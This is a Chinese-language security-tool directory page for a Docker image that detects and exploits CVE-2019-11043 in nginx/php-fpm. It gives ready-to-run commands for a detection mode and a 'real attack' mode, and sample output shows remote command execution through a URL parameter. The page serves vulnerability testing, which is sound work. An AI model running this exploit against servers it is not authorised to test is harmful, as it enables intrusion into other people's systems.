Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
docker-CVE-2019-11043 — 用于在 nginx/php-fpm 应用程序上检查 CVE-2019-11043 漏洞的 Docker 镜像和命令。 | Kitploit
工具/GitHubGitHub/ypereirareis/docker-cve-2019-11043
漏洞扫描器漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubypereirareis/docker-cve-2019-11043

docker-CVE-2019-11043

用于在 nginx/php-fpm 应用程序上检查 CVE-2019-11043 漏洞的 Docker 镜像和命令。

查看仓库
8216年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

用于检测 CVE-2019-11043 的 Docker 镜像和命令

Build Status

  • CVE: CVE-2019-11043
  • 描述: 在 PHP 7.1.x 低于 7.1.33、7.2.x 低于 7.2.24 以及 7.3.x 低于 7.3.11 的版本中,某些 FPM 配置下,FPM 模块可能会越过已分配的缓冲区,向为 FCGI 协议数据预留的空间写入数据,从而可能导致远程代码执行。
  • 详情 : https://nvd.nist.gov/vuln/detail/CVE-2019-11043
  • Github 漏洞利用: https://github.com/neex/phuip-fpizdam

帮助

root@kitploit:~
docker run --rm ypereirareis/cve-2019-11043
docker run --rm ypereirareis/cve-2019-11043 -h

检测网站或 URL

root@kitploit:~
docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/index.php

漏洞结果示例:

https://github.com/neex/phuip-fpizdam#playground-environment

仅检测模式

root@kitploit:~
$ docker run --rm --net=host ypereirareis/cve-2019-11043 --only-qsl http://127.0.0.1:8080/script.php
2019/10/30 10:55:35 Base status code is 200
2019/10/30 10:55:35 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 10:55:35 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 10:55:35 Detect() found QSLs and that's it

真实攻击模式

root@kitploit:~
$ docker run --rm --net=host ypereirareis/cve-2019-11043 http://127.0.0.1:8080/script.php 
2019/10/30 11:03:33 Base status code is 200
2019/10/30 11:03:33 Status code 502 for qsl=1765, adding as a candidate
2019/10/30 11:03:33 The target is probably vulnerable. Possible QSLs: [1755 1760 1765]
2019/10/30 11:03:33 Attack params found: --qsl 1760 --pisos 55 --skip-detect
2019/10/30 11:03:33 Trying to set "session.auto_start=0"...
2019/10/30 11:03:33 Detect() returned attack params: --qsl 1760 --pisos 55 --skip-detect <-- REMEMBER THIS
2019/10/30 11:03:33 Performing attack using php.ini settings...
2019/10/30 11:03:33 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/30 11:03:33 Trying to cleanup /tmp/a...
2019/10/30 11:03:33 Done!

Exploit

无漏洞结果示例:

root@kitploit:~
$ docker run --rm ypereirareis/cve-2019-11043 --only-qsl https://domain.tld/wp_admin.php
2019/10/28 09:41:30 Base status code is 200
2019/10/28 09:41:32 Detect() returned error: no qsl candidates found, invulnerable or something wrong

构建 Docker 镜像

root@kitploit:~
docker build -t ypereirareis/cve-2019-11043 .
下载工具